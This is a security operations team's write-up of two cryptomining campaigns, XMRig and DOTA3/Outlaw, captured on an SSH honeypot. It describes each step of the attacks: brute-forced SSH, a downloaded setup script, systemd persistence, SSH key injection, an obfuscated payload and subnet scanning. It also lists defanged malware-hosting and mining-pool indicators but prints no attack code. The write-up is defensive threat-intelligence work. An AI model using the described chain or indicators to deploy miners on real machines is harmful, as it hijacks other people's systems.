Attackers are stealing your CPU
As SOC analysts, we've seen the usual noise - SSH brute-force attempts, bot scans, "forgotten" webshells hidden in /tmp,
or worse, in wp-content/uploads. But sometimes the damage is not ransomware, no data theft or any destruction at all.
Sometimes, attackers just want your CPU cycles.
In this write-up, we are looking into two cryptocurrency mining campaigns recovered from our honeypots - XMRig and DOTA3/Outlaw. We'll walk you through how both miners were delivered and what artifacts were left behind.
XMRig
Our honeypot infrastructure is based on Cowrie which is an SSH honeypot, hence the attack has started with a brute-force attempt. After "guessing" the correct password, the attacker gained root access on the system and started dropping threat intel for us.
The attacker downloaded scripts from an external domain: hxxp[://]badintmine[.]onrender[.]com/setup[.]sh.
Investigating the domain on Lookyloo reveals that there are two setup scripts - one for Linux machine and the other one for Windows.
Digging even further, we submitted the setup.sh script to Pandora to analyze its contents and to confirm if it’s malicious or not:
Analyzing the script itself, we can see that it is downloading a new artefact from hxxp[://]badintmine[.]onrender[.]com/xmrig which is the actual cryptocurrency mining binary. The script then establishes persistence by creating a systemd service named badint, ensuring the miner automatically relaunches after a reboot. Additionally, the attacker wallet address is set and the system is connected to a remote mining pool pool[.]hashvault[.]pro:443.
The second script, setup.bat, is the Windows counterpart and it follows the same logic for Windows-based systems:
Pandora automatically extracts observables or potential IOCs to continue the investigation or to ingest it as threat intelligence:
A further Google search about the observables from the script is revealing that HashVault is a cryptocurrency mining pool commonly associated with Monero mining operations, while XMRig itself is a legitimate open-source mining software frequently used in cryptojacking campaigns.
This sample of xmrig is flagged as malicious by both Pandora and VirusTotal:
DOTA3/Outlaw
Firstly, the attacker injects an ssh key in the .ssh/authorized_keys allowing passwordless remote access for future logins. A specific indicator within the key itself is the comment mdrfckr, a signature leading to the Outlaw/Dota cryptomining attack.
Querying our OpenSearch instances for both the mdrfckr indicator and its associated SSH key are appearing repeatedly from many IP addresses. In total, the attacker attempted to authenticate and establish persistence on the honeypot infrastructure more than 150 times.
The next commands are basic reconnaissance, killing other competing miners or services and changing the root password with a random string.
The attacker executes a payload encoded in base64, likely as a simple obfuscation mechanism. After decoding the payload using CyberChef
, the script revealed functionality associated with the dota3 malware:
The decoded commands suggest attempts to (probably) move laterally to new machines using by scanning 192.168.0.0/16 and 172.16.0.0/16.
The /tmp/up.txt is a file containing <username>:<password> to brute force other machines in these subnets.
Unfortunately, this is just an assumption because the attacker did not manage to drop dota3 or kthreadadd before ending the session.
Nevertheless, the IOCs gathered strongly align with previously documented behavior associated with the Outlaw/DOTA cryptomining botnet.
Tools used
Throughout the investigation, we've used the following open-source tools or platforms to safely analyze the payloads:
Conclusions
Looking into these two cryptomining campaigns we've seen how they rely on simple techniques to compromise and monetize exposed systems. Both the XMRig and Dota/Outlaw activity chains leveraged brute-forced SSH access, lightweight persistence mechanisms, and legitimate tools to quietly hijack computational resources for cryptocurrency mining. While the XMRig campaign is more focused on deploying the scrips and start mining, the Dota/Outlaw counterpart showed a more advanced behavior by attempting lateral movement across the internal subnets.
SOCcare
The SOCcare project is co-funded by the European Union, alongside our collaborators, NRD Cyber Security and RevelSI, and supported by the European Cybersecurity Competence Centre (ECCC) Centre (ECCC) under Grant Agreement No. 101145843. Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Cybersecurity Competence Centre. Neither the European Union nor the European Cybersecurity Competence Centre can be held responsible for them.
